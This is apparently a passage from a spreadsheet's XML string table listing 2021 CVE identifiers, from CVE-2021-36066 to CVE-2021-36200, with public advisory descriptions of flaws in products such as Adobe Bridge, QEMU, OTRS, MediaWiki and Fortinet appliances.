    <t>Adobe Photoshop versions 21.2.10 (and earlier) and 22.4.3 (and earlier) are affected by a heap-based buffer overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36066</t>
  </si>
  <si>
    <t>Adobe Photoshop versions 21.2.10 (and earlier) and 22.4.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36067</t>
  </si>
  <si>
    <t>CVE-2021-36068</t>
  </si>
  <si>
    <t>CVE-2021-36069</t>
  </si>
  <si>
    <t>CVE-2021-3607</t>
  </si>
  <si>
    <t>An integer overflow was found in the QEMU implementation of VMWare's paravirtual RDMA device in versions prior to 6.1.0. The issue occurs while handling a "PVRDMA_REG_DSRHIGH" write from the guest due to improper input validation. This flaw allows a privileged guest user to make QEMU allocate a large amount of memory, resulting in a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36070</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 15.1 (and earlier) is affected by an improper memory access vulnerability when parsing a crafted .SVG file. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36071</t>
  </si>
  <si>
    <t>Adobe Bridge versions 11.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of arbitrary memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36072</t>
  </si>
  <si>
    <t>Adobe Bridge versions 11.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36073</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.1 (and earlier) is affected by a heap-based buffer overflow vulnerability when parsing a crafted .SGI file. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36074</t>
  </si>
  <si>
    <t>CVE-2021-36075</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.1 (and earlier) is affected by a Buffer Overflow vulnerability due to insecure handling of a malicious Bridge file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-36076</t>
  </si>
  <si>
    <t>CVE-2021-36077</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious SVG file, potentially resulting in local application denial of service in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-36078</t>
  </si>
  <si>
    <t>CVE-2021-36079</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .SGI file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-3608</t>
  </si>
  <si>
    <t>A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device in versions prior to 6.1.0. The issue occurs while handling a "PVRDMA_REG_DSRHIGH" write from the guest and may result in a crash of QEMU or cause undefined behavior due to the access of an uninitialized pointer. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36080</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.12.3.4163 through 0.12.3.4191 has a double-free in bit_chain_free (called from dwg_encode_MTEXT and dwg_encode_add_object).</t>
  </si>
  <si>
    <t>CVE-2021-36081</t>
  </si>
  <si>
    <t>Tesseract OCR 5.0.0-alpha-20201231 has a one_ell_conflict use-after-free during a strpbrk call.</t>
  </si>
  <si>
    <t>CVE-2021-36082</t>
  </si>
  <si>
    <t>ntop nDPI 3.4 has a stack-based buffer overflow in processClientServerHello.</t>
  </si>
  <si>
    <t>CVE-2021-36083</t>
  </si>
  <si>
    <t>KDE KImageFormats 5.70.0 through 5.81.0 has a stack-based buffer overflow in XCFImageFormat::loadTileRLE.</t>
  </si>
  <si>
    <t>CVE-2021-36084</t>
  </si>
  <si>
    <t>The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).</t>
  </si>
  <si>
    <t>CVE-2021-36085</t>
  </si>
  <si>
    <t>The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).</t>
  </si>
  <si>
    <t>CVE-2021-36086</t>
  </si>
  <si>
    <t>The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).</t>
  </si>
  <si>
    <t>CVE-2021-36087</t>
  </si>
  <si>
    <t>The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.</t>
  </si>
  <si>
    <t>CVE-2021-36088</t>
  </si>
  <si>
    <t>Fluent Bit (aka fluent-bit) 1.7.0 through 1.7,4 has a double free in flb_free (called from flb_parser_json_do and flb_parser_do).</t>
  </si>
  <si>
    <t>CVE-2021-36089</t>
  </si>
  <si>
    <t>Grok 7.6.6 through 9.2.0 has a heap-based buffer overflow in grk::FileFormatDecompress::apply_palette_clr (called from grk::FileFormatDecompress::applyColour).</t>
  </si>
  <si>
    <t>CVE-2021-3609</t>
  </si>
  <si>
    <t>.A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges. This race condition in net/can/bcm.c in the Linux kernel allows for local privilege escalation to root.</t>
  </si>
  <si>
    <t>CVE-2021-36090</t>
  </si>
  <si>
    <t>When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.</t>
  </si>
  <si>
    <t>CVE-2021-36091</t>
  </si>
  <si>
    <t>Agents are able to list appointments in the calendars without required permissions. This issue affects: OTRS AG ((OTRS)) Community Edition: 6.0.x version 6.0.1 and later versions. OTRS AG OTRS: 7.0.x versions prior to 7.0.27.</t>
  </si>
  <si>
    <t>CVE-2021-36092</t>
  </si>
  <si>
    <t>It's possible to create an email which contains specially crafted link and it can be used to perform XSS attack. This issue affects: OTRS AG ((OTRS)) Community Edition:6.0.x version 6.0.1 and later versions. OTRS AG OTRS: 7.0.x version 7.0.27 and prior versions; 8.0.x version 8.0.14 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36093</t>
  </si>
  <si>
    <t>It's possible to create an email which can be stuck while being processed by PostMaster filters, causing DoS. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.28 and prior versions; 8.0.x version 8.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36094</t>
  </si>
  <si>
    <t>It's possible to craft a request for appointment edit screen, which could lead to the XSS attack. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.28 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36095</t>
  </si>
  <si>
    <t>Malicious attacker is able to find out valid user logins by using the "lost password" feature. This issue affects: OTRS AG ((OTRS)) Community Edition version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.28 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36096</t>
  </si>
  <si>
    <t>Generated Support Bundles contains private S/MIME and PGP keys if containing folder is not hidden. This issue affects: OTRS AG ((OTRS)) Community Edition 6.0.x version 6.0.1 and later versions. OTRS AG OTRS 7.0.x version 7.0.28 and prior versions; 8.0.x version 8.0.15 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36097</t>
  </si>
  <si>
    <t>Agents are able to lock the ticket without the "Owner" permission. Once the ticket is locked, it could be moved to the queue where the agent has "rw" permissions and gain a full control. This issue affects: OTRS AG OTRS 8.0.x version: 8.0.16 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-3610</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability was found in ImageMagick in versions prior to 7.0.11-14 in ReadTIFFImage() in coders/tiff.c. This issue is due to an incorrect setting of the pixel array size, which can lead to a crash and segmentation fault.</t>
  </si>
  <si>
    <t>CVE-2021-36100</t>
  </si>
  <si>
    <t>Specially crafted string in OTRS system configuration can allow the execution of any system command.</t>
  </si>
  <si>
    <t>CVE-2021-3611</t>
  </si>
  <si>
    <t>A stack overflow vulnerability was found in the Intel HD Audio device (intel-hda) of QEMU. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition. The highest threat from this vulnerability is to system availability. This flaw affects QEMU versions prior to 7.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-3612</t>
  </si>
  <si>
    <t>An out-of-bounds memory write flaw was found in the Linux kernel's joystick devices subsystem in versions before 5.9-rc1, in the way the user calls ioctl JSIOCSBTNMAP. This flaw allows a local user to crash the system or possibly escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36121</t>
  </si>
  <si>
    <t>An issue was discovered in Echo ShareCare 8.15.5. The file-upload feature in Access/DownloadFeed_Mnt/FileUpload_Upd.cfm is susceptible to an unrestricted upload vulnerability via the name1 parameter, when processing remote input from an authenticated user, leading to the ability for arbitrary files to be written to arbitrary filesystem locations via ../ Directory Traversal on the Z: drive (a hard-coded drive letter where ShareCare application files reside) and remote code execution as the ShareCare service user (NT AUTHORITY\SYSTEM).</t>
  </si>
  <si>
    <t>CVE-2021-36122</t>
  </si>
  <si>
    <t>An issue was discovered in Echo ShareCare 8.15.5. The UnzipFile feature in Access/EligFeedParse_Sup/UnzipFile_Upd.cfm is susceptible to a command argument injection vulnerability when processing remote input in the zippass parameter from an authenticated user, leading to the ability to inject arbitrary arguments to 7z.exe.</t>
  </si>
  <si>
    <t>CVE-2021-36123</t>
  </si>
  <si>
    <t>An issue was discovered in Echo ShareCare 8.15.5. The TextReader feature in General/TextReader/TextReader.cfm is susceptible to a local file inclusion vulnerability when processing remote input in the textFile parameter from an authenticated user, leading to the ability to read arbitrary files on the server filesystems as well any files accessible via Universal Naming Convention (UNC) paths.</t>
  </si>
  <si>
    <t>CVE-2021-36124</t>
  </si>
  <si>
    <t>An issue was discovered in Echo ShareCare 8.15.5. It does not perform authentication or authorization checks when accessing a subset of sensitive resources, leading to the ability for unauthenticated users to access pages that are vulnerable to attacks such as SQL injection.</t>
  </si>
  <si>
    <t>CVE-2021-36125</t>
  </si>
  <si>
    <t>An issue was discovered in the CentralAuth extension in MediaWiki through 1.36. The Special:GlobalRenameRequest page is vulnerable to infinite loops and denial of service attacks when a user's current username is beyond an arbitrary maximum configuration value (MaxNameChars).</t>
  </si>
  <si>
    <t>CVE-2021-36126</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension in MediaWiki through 1.36. If the MediaWiki:Abusefilter-blocker message is invalid within the content language, the filter user falls back to the English version, but that English version could also be invalid on a wiki. This would result in a fatal error, and potentially fail to block or restrict a potentially nefarious user.</t>
  </si>
  <si>
    <t>CVE-2021-36127</t>
  </si>
  <si>
    <t>An issue was discovered in the CentralAuth extension in MediaWiki through 1.36. The Special:GlobalUserRights page provided search results which, for a suppressed MediaWiki user, were different than for any other user, thus easily disclosing suppressed accounts (which are supposed to be completely hidden).</t>
  </si>
  <si>
    <t>CVE-2021-36128</t>
  </si>
  <si>
    <t>An issue was discovered in the CentralAuth extension in MediaWiki through 1.36. Autoblocks for CentralAuth-issued suppression blocks are not properly implemented.</t>
  </si>
  <si>
    <t>CVE-2021-36129</t>
  </si>
  <si>
    <t>An issue was discovered in the Translate extension in MediaWiki through 1.36. The Aggregategroups Action API module does not validate the parameter for aggregategroup when action=remove is set, thus allowing users with the translate-manage right to silently delete various groups' metadata.</t>
  </si>
  <si>
    <t>CVE-2021-3613</t>
  </si>
  <si>
    <t>OpenVPN Connect 3.2.0 through 3.3.0 allows local users to load arbitrary dynamic loadable libraries via an OpenSSL configuration file if present, which allows the user to run arbitrary code with the same privilege level as the main OpenVPN process (OpenVPNConnect.exe).</t>
  </si>
  <si>
    <t>CVE-2021-36130</t>
  </si>
  <si>
    <t>An XSS issue was discovered in the SocialProfile extension in MediaWiki through 1.36. Within several gift-related special pages, a privileged user with the awardmanage right could inject arbitrary HTML and JavaScript within various gift-related data fields. The attack could easily propagate across many pages for many users.</t>
  </si>
  <si>
    <t>CVE-2021-36131</t>
  </si>
  <si>
    <t>An XSS issue was discovered in the SportsTeams extension in MediaWiki through 1.36. Within several special pages, a privileged user could inject arbitrary HTML and JavaScript within various data fields. The attack could easily propagate across many pages for many users.</t>
  </si>
  <si>
    <t>CVE-2021-36132</t>
  </si>
  <si>
    <t>An issue was discovered in the FileImporter extension in MediaWiki through 1.36. For certain relaxed configurations of the $wgFileImporterRequiredRight variable, it might not validate all appropriate user rights, thus allowing a user with insufficient rights to perform operations (specifically file uploads) that they should not be allowed to perform.</t>
  </si>
  <si>
    <t>CVE-2021-36133</t>
  </si>
  <si>
    <t>The OPTEE-OS CSU driver for NXP i.MX SoC devices lacks security access configuration for several models, resulting in TrustZone bypass because the NonSecure World can perform arbitrary memory read/write operations on Secure World memory. This involves a DMA capable peripheral.</t>
  </si>
  <si>
    <t>CVE-2021-36134</t>
  </si>
  <si>
    <t>Out of bounds write vulnerability in the JPEG parsing code of Netop Vision Pro up to and including 9.7.2 allows an adjacent unauthenticated attacker to write to arbitrary memory potentially leading to a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2021-3614</t>
  </si>
  <si>
    <t>A vulnerability was reported on some Lenovo Notebook systems that could allow an attacker with physical access to elevate privileges under certain conditions during a BIOS update performed by Lenovo Vantage.</t>
  </si>
  <si>
    <t>CVE-2021-36143</t>
  </si>
  <si>
    <t>ACRN before 2.5 has a hw/pci/virtio/virtio.c vq_endchains NULL Pointer Dereference.</t>
  </si>
  <si>
    <t>CVE-2021-36144</t>
  </si>
  <si>
    <t>The polling timer handler in ACRN before 2.5 has a use-after-free for a freed virtio device, related to devicemodel/hw/pci/virtio/*.c.</t>
  </si>
  <si>
    <t>CVE-2021-36145</t>
  </si>
  <si>
    <t>The Device Model in ACRN through 2.5 has a devicemodel/core/mem.c use-after-free for a freed rb_entry.</t>
  </si>
  <si>
    <t>CVE-2021-36146</t>
  </si>
  <si>
    <t>ACRN before 2.5 has a devicemodel/hw/pci/xhci.c NULL Pointer Dereference for a trb pointer.</t>
  </si>
  <si>
    <t>CVE-2021-36147</t>
  </si>
  <si>
    <t>An issue was discovered in ACRN before 2.5. It allows a devicemodel/hw/pci/virtio/virtio_net.c virtio_net_ping_rxq NULL pointer dereference for vq-&gt;used.</t>
  </si>
  <si>
    <t>CVE-2021-36148</t>
  </si>
  <si>
    <t>An issue was discovered in ACRN before 2.5. dmar_free_irte in hypervisor/arch/x86/vtd.c allows an irte_alloc_bitmap buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-3615</t>
  </si>
  <si>
    <t>A vulnerability was reported in Lenovo Smart Camera X3, X5, and C2E that could allow code execution if a specific file exists on the attached SD card. This vulnerability is the same as CNVD-2021-45262.</t>
  </si>
  <si>
    <t>CVE-2021-36150</t>
  </si>
  <si>
    <t>SilverStripe Framework through 4.8.1 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-36151</t>
  </si>
  <si>
    <t>In Apache Gobblin, the Hadoop token is written to a temp file that is visible to all local users on Unix-like systems. This affects versions &lt;= 0.15.0. Users should update to version 0.16.0 which addresses this issue.</t>
  </si>
  <si>
    <t>CVE-2021-36152</t>
  </si>
  <si>
    <t>Apache Gobblin trusts all certificates used for LDAP connections in Gobblin-as-a-Service. This affects versions &lt;= 0.15.0. Users should update to version 0.16.0 which addresses this issue.</t>
  </si>
  <si>
    <t>CVE-2021-36153</t>
  </si>
  <si>
    <t>Mismanaged state in GRPCWebToHTTP2ServerCodec.swift in gRPC Swift 1.1.0 and 1.1.1 allows remote attackers to deny service by sending malformed requests.</t>
  </si>
  <si>
    <t>CVE-2021-36154</t>
  </si>
  <si>
    <t>HTTP2ToRawGRPCServerCodec in gRPC Swift 1.1.1 and earlier allows remote attackers to deny service via the delivery of many small messages within a single HTTP/2 frame, leading to Uncontrolled Recursion and stack consumption.</t>
  </si>
  <si>
    <t>CVE-2021-36155</t>
  </si>
  <si>
    <t>LengthPrefixedMessageReader in gRPC Swift 1.1.0 and earlier allocates buffers of arbitrary length, which allows remote attackers to cause uncontrolled resource consumption and deny service.</t>
  </si>
  <si>
    <t>CVE-2021-36156</t>
  </si>
  <si>
    <t>An issue was discovered in Grafana Loki through 2.2.1. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Loki will attempt to parse a rules file at that location and include some of the contents in the error message.</t>
  </si>
  <si>
    <t>CVE-2021-36157</t>
  </si>
  <si>
    <t>An issue was discovered in Grafana Cortex through 1.9.0. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Cortex will attempt to parse a rules file at that location and include some of the contents in the error message. (Other Cortex API requests can also be sent a malicious OrgID header, e.g., tricking the ingester into writing metrics to a different location, but the effect is nuisance rather than information disclosure.)</t>
  </si>
  <si>
    <t>CVE-2021-36158</t>
  </si>
  <si>
    <t>In the xrdp package (in branches through 3.14) for Alpine Linux, RDP sessions are vulnerable to man-in-the-middle attacks because pre-generated RSA certificates and private keys are used.</t>
  </si>
  <si>
    <t>CVE-2021-36159</t>
  </si>
  <si>
    <t>libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\0' terminator one byte too late.</t>
  </si>
  <si>
    <t>CVE-2021-3616</t>
  </si>
  <si>
    <t>A vulnerability was reported in Lenovo Smart Camera X3, X5, and C2E that could allow an unauthorized user to view device information, alter firmware content and device configuration. This vulnerability is the same as CNVD-2020-68651.</t>
  </si>
  <si>
    <t>CVE-2021-36160</t>
  </si>
  <si>
    <t>A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive).</t>
  </si>
  <si>
    <t>CVE-2021-36161</t>
  </si>
  <si>
    <t>Some component in Dubbo will try to print the formated string of the input arguments, which will possibly cause RCE for a maliciously customized bean with special toString method. In the latest version, we fix the toString call in timeout, cache and some other places. Fixed in Apache Dubbo 2.7.13</t>
  </si>
  <si>
    <t>CVE-2021-36162</t>
  </si>
  <si>
    <t>Apache Dubbo supports various rules to support configuration override or traffic routing (called routing in Dubbo). These rules are loaded into the configuration center (eg: Zookeeper, Nacos, ...) and retrieved by the customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers will use SnakeYAML library to load the rules which by default will enable calling arbitrary constructors. An attacker with access to the configuration center he will be able to poison the rule so when retrieved by the consumers, it will get RCE on all of them. This was fixed in Dubbo 2.7.13, 3.0.2</t>
  </si>
  <si>
    <t>CVE-2021-36163</t>
  </si>
  <si>
    <t>In Apache Dubbo, users may choose to use the Hessian protocol. The Hessian protocol is implemented on top of HTTP and passes the body of a POST request directly to a HessianSkeleton: New HessianSkeleton are created without any configuration of the serialization factory and therefore without applying the dubbo properties for applying allowed or blocked type lists. In addition, the generic service is always exposed and therefore attackers do not need to figure out a valid service/method name pair. This is fixed in 2.7.13, 2.6.10.1</t>
  </si>
  <si>
    <t>CVE-2021-36165</t>
  </si>
  <si>
    <t>RICON Industrial Cellular Router S9922L 16.10.3(3794) is affected by cleartext storage of sensitive information and sends username and password as base64.</t>
  </si>
  <si>
    <t>CVE-2021-36166</t>
  </si>
  <si>
    <t>An improper authentication vulnerability in FortiMail before 7.0.1 may allow a remote attacker to efficiently guess one administrative account's authentication token by means of the observation of certain system's properties.</t>
  </si>
  <si>
    <t>CVE-2021-36167</t>
  </si>
  <si>
    <t>An improper authorization vulnerabiltiy [CWE-285] in FortiClient Windows versions 7.0.0 and 6.4.6 and below and 6.2.8 and below may allow an unauthenticated attacker to bypass the webfilter control via modifying the session-id paramater.</t>
  </si>
  <si>
    <t>CVE-2021-36168</t>
  </si>
  <si>
    <t>A Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in Fortinet FortiPortal 6.x before 6.0.5, FortiPortal 5.3.x before 5.3.6 and any FortiPortal before 6.2.5 allows authenticated attacker to disclosure information via crafted GET request with malicious parameter values.</t>
  </si>
  <si>
    <t>CVE-2021-36169</t>
  </si>
  <si>
    <t>A Hidden Functionality in Fortinet FortiOS 7.x before 7.0.1, FortiOS 6.4.x before 6.4.7 allows attacker to Execute unauthorized code or commands via specific hex read/write operations.</t>
  </si>
  <si>
    <t>CVE-2021-3617</t>
  </si>
  <si>
    <t>A vulnerability was reported in Lenovo Smart Camera X3, X5, and C2E that could allow command injection by setting a specially crafted network configuration. This vulnerability is the same as CNVD-2020-68652.</t>
  </si>
  <si>
    <t>CVE-2021-36170</t>
  </si>
  <si>
    <t>An information disclosure vulnerability [CWE-200] in FortiAnalyzerVM and FortiManagerVM versions 7.0.0 and 6.4.6 and below may allow an authenticated attacker to read the FortiCloud credentials which were used to activate the trial license in cleartext.</t>
  </si>
  <si>
    <t>CVE-2021-36171</t>
  </si>
  <si>
    <t>The use of a cryptographically weak pseudo-random number generator in the password reset feature of FortiPortal before 6.0.6 may allow a remote unauthenticated attacker to predict parts of or the whole newly generated password within a given time frame.</t>
  </si>
  <si>
    <t>CVE-2021-36172</t>
  </si>
  <si>
    <t>An improper restriction of XML external entity reference vulnerability in the parser of XML responses of FortiPortal before 6.0.6 may allow an attacker who controls the producer of XML reports consumed by FortiPortal to trigger a denial of service or read arbitrary files from the underlying file system by means of specifically crafted XML documents.</t>
  </si>
  <si>
    <t>CVE-2021-36173</t>
  </si>
  <si>
    <t>A heap-based buffer overflow in the firmware signature verification function of FortiOS versions 7.0.1, 7.0.0, 6.4.0 through 6.4.6, 6.2.0 through 6.2.9, and 6.0.0 through 6.0.13 may allow an attacker to execute arbitrary code via specially crafted installation images.</t>
  </si>
  <si>
    <t>CVE-2021-36174</t>
  </si>
  <si>
    <t>A memory allocation with excessive size value vulnerability in the license verification function of FortiPortal before 6.0.6 may allow an attacker to perform a denial of service attack via specially crafted license blobs.</t>
  </si>
  <si>
    <t>CVE-2021-36175</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability [CWE-79] in FortiWebManager versions 6.2.3 and below, 6.0.2 and below may allow a remote authenticated attacker to inject malicious script/tags via the name/description/comments parameter of various sections of the device.</t>
  </si>
  <si>
    <t>CVE-2021-36176</t>
  </si>
  <si>
    <t>CVE-2021-36177</t>
  </si>
  <si>
    <t>An improper access control vulnerability [CWE-284] in FortiAuthenticator HA service 6.3.2 and below, 6.2.x, 6.1.x, 6.0.x may allow an attacker on the same vlan as the HA management interface to make an unauthenticated direct connection to the FAC's database.</t>
  </si>
  <si>
    <t>CVE-2021-36178</t>
  </si>
  <si>
    <t>A insufficiently protected credentials in Fortinet FortiSDNConnector version 1.1.7 and below allows attacker to disclose third-party devices credential information via configuration page lookup.</t>
  </si>
  <si>
    <t>CVE-2021-36179</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in Fortinet FortiWeb version 6.3.14 and below, 6.2.4 and below allows attacker to execute unauthorized code or commands via crafted parameters in CLI command execution</t>
  </si>
  <si>
    <t>CVE-2021-3618</t>
  </si>
  <si>
    <t>ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. A MiTM attacker having access to victim's traffic at the TCP/IP layer can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.</t>
  </si>
  <si>
    <t>CVE-2021-36180</t>
  </si>
  <si>
    <t>Multiple improper neutralization of special elements used in a command vulnerabilities [CWE-77] in FortiWeb management interface 6.4.1 and below, 6.3.15 and below, 6.2.5 and below may allow an authenticated attacker to execute unauthorized code or commands via crafted parameters of HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-36181</t>
  </si>
  <si>
    <t>A concurrent execution using shared resource with improper Synchronization vulnerability ('Race Condition') in the customer database interface of FortiPortal before 6.0.6 may allow an authenticated, low-privilege user to bring the underlying database data into an inconsistent state via specific coordination of web requests.</t>
  </si>
  <si>
    <t>CVE-2021-36182</t>
  </si>
  <si>
    <t>A Improper neutralization of special elements used in a command ('Command Injection') in Fortinet FortiWeb version 6.3.13 and below allows attacker to execute unauthorized code or commands via crafted HTTP requests</t>
  </si>
  <si>
    <t>CVE-2021-36183</t>
  </si>
  <si>
    <t>An improper authorization vulnerability [CWE-285] in FortiClient for Windows versions 7.0.1 and below and 6.4.2 and below may allow a local unprivileged attacker to escalate their privileges to SYSTEM via the named pipe responsible for Forticlient updates.</t>
  </si>
  <si>
    <t>CVE-2021-36184</t>
  </si>
  <si>
    <t>A improper neutralization of Special Elements used in an SQL Command ('SQL Injection') in Fortinet FortiWLM version 8.6.1 and below allows attacker to disclosure device, users and database information via crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-36185</t>
  </si>
  <si>
    <t>A improper neutralization of special elements used in an OS command ('OS Command Injection') in Fortinet FortiWLM version 8.6.1 and below allows attacker to execute unauthorized code or commands via crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-36186</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in Fortinet FortiWeb version 6.4.0, version 6.3.15 and below, 6.2.5 and below allows attacker to execute unauthorized code or commands via crafted HTTP requests</t>
  </si>
  <si>
    <t>CVE-2021-36187</t>
  </si>
  <si>
    <t>A uncontrolled resource consumption in Fortinet FortiWeb version 6.4.0, version 6.3.15 and below, 6.2.5 and below allows attacker to cause a denial of service for webserver daemon via crafted HTTP requests</t>
  </si>
  <si>
    <t>CVE-2021-36188</t>
  </si>
  <si>
    <t>A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiWeb version 6.4.1 and below, 6.3.15 and below allows attacker to execute unauthorized code or commands via crafted GET parameters in requests to login and error handlers</t>
  </si>
  <si>
    <t>CVE-2021-36189</t>
  </si>
  <si>
    <t>A missing encryption of sensitive data in Fortinet FortiClientEMS version 7.0.1 and below, version 6.4.4 and below allows attacker to information disclosure via inspecting browser decrypted data</t>
  </si>
  <si>
    <t>CVE-2021-3619</t>
  </si>
  <si>
    <t>Rapid7 Velociraptor 0.5.9 and prior is vulnerable to a post-authentication persistent cross-site scripting (XSS) issue, where an authenticated user could abuse MIME filetype sniffing to embed executable code on a malicious upload. This issue was fixed in version 0.6.0. Note that login rights to Velociraptor is nearly always reserved for trusted and verified users with IT security backgrounds.</t>
  </si>
  <si>
    <t>CVE-2021-36190</t>
  </si>
  <si>
    <t>A unintended proxy or intermediary ('confused deputy') in Fortinet FortiWeb version 6.4.1 and below, 6.3.15 and below allows an unauthenticated attacker to access protected hosts via crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-36191</t>
  </si>
  <si>
    <t>A url redirection to untrusted site ('open redirect') in Fortinet FortiWeb version 6.4.1 and below, 6.3.15 and below allows attacker to use the device as proxy via crafted GET parameters in requests to error handlers</t>
  </si>
  <si>
    <t>CVE-2021-36192</t>
  </si>
  <si>
    <t>An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in FortiManager 7.0.1 and below, 6.4.6 and below, 6.2.x, 6.0.x, 5.6.0 may allow a FortiGate user to see scripts from other ADOMS.</t>
  </si>
  <si>
    <t>CVE-2021-36193</t>
  </si>
  <si>
    <t>Multiple stack-based buffer overflows in the command line interpreter of FortiWeb before 6.4.2 may allow an authenticated attacker to achieve arbitrary code execution via specially crafted commands.</t>
  </si>
  <si>
    <t>CVE-2021-36194</t>
  </si>
  <si>
    <t>Multiple stack-based buffer overflows in the API controllers of FortiWeb 6.4.1, 6.4.0, and 6.3.0 through 6.3.15 may allow an authenticated attacker to achieve arbitrary code execution via specially crafted requests.</t>
  </si>
  <si>
    <t>CVE-2021-36195</t>
  </si>
  <si>
    <t>Multiple command injection vulnerabilities in the command line interpreter of FortiWeb versions 6.4.1, 6.4.0, 6.3.0 through 6.3.15, 6.2.0 through 6.2.6, and 6.1.0 through 6.1.2 may allow an authenticated attacker to execute arbitrary commands on the underlying system shell via specially crafted command arguments.</t>
  </si>
  <si>
    <t>CVE-2021-36198</t>
  </si>
  <si>
    <t>Successful exploitation of this vulnerability could allow an unauthorized user to access sensitive data.</t>
  </si>
  <si>
    <t>CVE-2021-36199</t>
  </si>
  <si>
    <t>Running a vulnerability scanner against VideoEdge NVRs can cause some functionality to stop.</t>
  </si>
  <si>
    <t>CVE-2021-3620</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine's ansible-connection module, where sensitive information such as the Ansible user credentials is disclosed by default in the traceback error message. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-36200</t>
  </si>
  <si>
